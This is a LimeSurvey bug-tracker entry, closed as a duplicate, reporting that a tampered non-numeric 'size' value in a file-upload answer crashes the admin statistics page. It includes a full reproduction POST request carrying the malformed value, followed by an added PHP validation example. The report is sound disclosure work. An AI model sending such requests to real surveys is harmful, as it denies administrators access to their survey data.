View Issue Details

This bug affects 1 person(s).
ID: 19720
Project: Bug reports
Category: Security
View Status: public
Last Update: 2024-08-26 11:57
Reporter: judx
Assigned To: DenisChenu
Priority: none
Severity: minor
Status: closed
Resolution: duplicate
Summary: 19720: Improper Input Validation
Description

Just wanted to flag another pretty serious issue with LimeSurvey related to improper input validation. It seems that when using the file upload option in surveys, the system doesn't properly validate the size of uploaded files. Attackers can manipulate the size parameter, which can lead to a denial of service, making it impossible for admins to access survey stats.

More details:

This issue is currently blocking the use of LimeSurvey safely.

Steps To Reproduce

Reproduction

  1. Log in to the administrator account.
  2. Create a survey containing the "file upload" option. For example: 949614.
  3. During the survey submission process, use manipulated data to set the "size" parameter to a non-integer value. [No permissions are required]
  4. POST

    POST /index.php/949614 HTTP/1.1
    Host: 192.168.160.130
    Content-Length: 1706
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoGwet3umTM5p8M8U
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="YII_CSRF_TOKEN"

    X3VhN0Y2cmIyNVhCMXdFV1BQN0pqVm5iWWw0Q1NpNWKEYOQK5nWbFzgIPM_Ra9R9HWiCLpQjslDBrDKki4XtyQ==
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="fieldnames"

    949614X1X1|949614X1X2|949614X1X2_filecount
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="thisstep"

    1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="sid"

    949614
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="start_time"

    1692852765
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="LEMpostKey"

    1887323363
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="relevance1"

    1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="relevance2"

    1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="relevanceG0"

    1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="949614X1X1"

    aeawe
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="949614X1X2"

    [{"title":"","comment":"","size":"5.201171875tesat","name":"GAIA-URL.txt","filename":"futmp_drezdtkw4u3rsf8_txt","ext":"txt"}]
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="949614X1X2_filecount"

    1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="lastgroup"

    949614X1
    ------WebKitFormBoundaryoGwet3umTM5p8M8U
    Content-Disposition: form-data; name="move"

    movesubmit
    ------WebKitFormBoundaryoGwet3umTM5p8M8U--


  5. Open http://192.168.160.130/index.php/responses/browse?surveyId=135964. The administrator is unable to open all statistical data for this questionnaire and is shown: Error code 500: Internal server error round(): Argument #1 ($num) must be of type int|float, string given.
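The failure above is a PHP 8 TypeError: the statistics page passes the submitted "size" string to round() without checking it is numeric. The following is an added example, not LimeSurvey's own code, showing the defensive parsing of a file-upload answer; the JSON layout is taken from the request above, and the size unit (kilobytes) is an assumption.

```php
<?php
declare(strict_types=1);
// Added example, not LimeSurvey's own code. A file-upload answer is a JSON
// array of file records, as in the request above; "size" comes straight
// from the submitted form and must be validated before round() sees it.

/**
 * Decode a file-upload answer and keep only records whose "size" is a
 * finite, non-negative number; tampered values like "5.2tesat" are dropped.
 */
function parseFileUploadAnswer(string $json): array
{
    $records = json_decode($json, true);
    if (!is_array($records)) {
        return [];
    }
    $clean = [];
    foreach ($records as $record) {
        // is_numeric() accepts "5.2" and "12" but rejects "5.201171875tesat".
        if (!is_array($record) || !isset($record['size']) || !is_numeric($record['size'])) {
            continue;
        }
        $size = (float) $record['size'];
        if (!is_finite($size) || $size < 0) {
            continue; // e.g. "1e999" overflows to INF
        }
        $record['size'] = $size;
        $clean[] = $record;
    }
    return $clean;
}

/**
 * Sum of validated sizes (unit assumed to be KB, as the application defines it),
 * rounded as a statistics page would, with no TypeError on PHP 8.
 */
function totalUploadSize(string $json): float
{
    $total = 0.0;
    foreach (parseFileUploadAnswer($json) as $record) {
        $total += $record['size'];
    }
    return round($total, 2);
}

// Constructed sample: one tampered record, one well-formed record.
$answer = '[{"title":"","comment":"","size":"5.201171875tesat","name":"a.txt","filename":"futmp_a","ext":"txt"},'
        . '{"title":"","comment":"","size":"12.5","name":"b.txt","filename":"futmp_b","ext":"txt"}]';
printf("%d valid record(s), total size %.2f\n", count(parseFileUploadAnswer($answer)), totalUploadSize($answer));
```

The same check belongs at submission time as well, so that a malformed record is rejected with a validation error rather than stored and discovered later by the admin views.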
Tags: No tags attached.
Bug heat: 252
Complete LimeSurvey version number (& build): 6.3.0-231016
I will donate to the project if issue is resolved: No
Browser:
Database type & version: any
Server OS (if known):
Webserver software & version (if known):
PHP Version: any


Activities

DenisChenu (developer) ~80826
2024-08-26 11:57

Please check it before reporting again :)

Issue History

Date Modified Username Field Change
2024-08-26 11:49 judx New Issue
2024-08-26 11:57 DenisChenu Assigned To => DenisChenu
2024-08-26 11:57 DenisChenu Status new => closed
2024-08-26 11:57 DenisChenu Resolution open => duplicate
2024-08-26 11:57 DenisChenu Note Added: 80826
2024-08-26 11:57 DenisChenu Bug heat 250 => 252